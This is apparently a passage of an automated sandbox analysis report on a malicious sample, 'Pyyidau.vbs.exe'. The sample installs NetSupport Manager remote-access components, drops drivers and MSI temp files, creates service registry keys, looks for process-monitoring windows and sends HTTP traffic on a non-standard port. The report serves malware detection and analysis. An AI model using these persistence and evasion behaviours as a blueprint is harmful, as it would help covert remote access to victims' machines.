                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI24C5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E8F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23F5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2E95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI264F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FCC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI213F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4C31.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29BD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6914.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B65.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2485.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6963.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI51A0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI207D.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1ECF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI21DF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DF0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2504.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI291F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI215F.tmpJump to dropped file
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\SysWOW64\pcimsg.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E6F.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\client32provider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1B79.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI68D5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI201E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1AFB.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DD0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2BE4.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI57BD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2435.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1C08.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20BE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI21BF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI209E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI51C1.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI222E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F4F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20DE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI211F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E3F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F1F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1BC9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FBE.tmpJump to dropped file
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,GetCurrentDirectoryW,_wcsrchr,PostMessageW,KiUserCallbackDispatcher,_fputs,Sleep,32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\setupact.log
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\setuperr.log

                                Boot Survival

                                barindex
                                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Windows\Installer\MSI3FCC.tmpRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PCIsys
                                Source: C:\Windows\Installer\MSI3FCC.tmpRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\HyperVideo
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B29630 OpenSCManagerW,GetLastError,GetLastError,OpenServiceW,GetLastError,QueryServiceStatus,QueryServiceStatus,_memset,GetSystemDirectoryW,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,GetLastError,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,RegisterEventSourceW,GetComputerNameW,wsprintfW,ReportEventW,DeregisterEventSource,GetLastError,CloseServiceHandle,CloseServiceHandle,Sleep,GetSystemDirectoryW,28_2_00B29630

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49832
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B244C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,28_2_00B244C0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B244C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,28_2_00B244C0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004944C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,30_2_004944C0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004944C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,30_2_004944C0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B44C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,32_2_001B44C0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B44C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,32_2_001B44C0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B14760 GetModuleFileNameW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,28_2_00B14760
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmpProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess information set: NOGPFAULTERRORBOX
